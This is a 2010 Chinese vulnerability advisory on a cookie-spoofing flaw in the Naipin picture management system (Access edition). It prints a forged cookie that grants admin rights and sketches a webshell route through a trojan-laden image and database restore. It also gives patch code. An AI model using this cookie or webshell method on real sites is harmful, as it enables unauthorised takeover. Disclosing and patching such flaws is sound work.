發布日期:2010-10.08 發布作者:redice 影響版本:20100906 Access版 官方地址:http://www.naipin.com/ 漏洞 類型:Cookie 欺騙 漏洞 描述:大概一年前我發現了《耐品 圖片 管理 系統 Access版》有Cookie 欺騙 漏洞 :任意用戶可以通過修改Cookie拿到 管理
發布日期:2010-10.08
發布作者:redice
影響版本:20100906 Access版
官方地址:http://www.naipin.com/
漏洞類型:Cookie欺騙
漏洞描述:大概一年前我發現了《耐品圖片管理系統Access版》有Cookie欺騙漏洞:任意用戶可以通過修改Cookie拿到管理員權限。
今年6月份我給耐品技術發了郵件,告知了這個漏洞,他們回復如下:
”您好,謝謝您的提醒!
祝您合家幸福安康!“
今天我下載了最新版(Naipin_T_20100906_acc.rar)進行了測試,發現這個漏洞仍然存在。
既然官方如此不重視,我就它放出來。
Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL
利用上面的cookie不登錄也能拿到管理員權限...
拿Webshell的一種思路:
如果數據庫后綴名是asp的,可以采用該思路。上傳用戶圖像,上傳一張含有一句話木馬的圖片(采用edjpgcom工具)。
進入后臺,使用數據庫恢復功能將上傳的圖片恢復為數據庫。
修復方案:臨時修補辦法如下:
(1)Admin_ChkLogin.asp第66行下增加如下代碼:
session("GroupId")=Rs("GroupId")
(2)將clsMain.asp的第112行改為如下代碼:
UserGroupId=session("GroupID")
(3)建議盡量做到:能寫入的目錄不給執行權限,能執行的目錄不給寫入權限。
標簽分類: cookie欺騙 驗證漏洞
聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com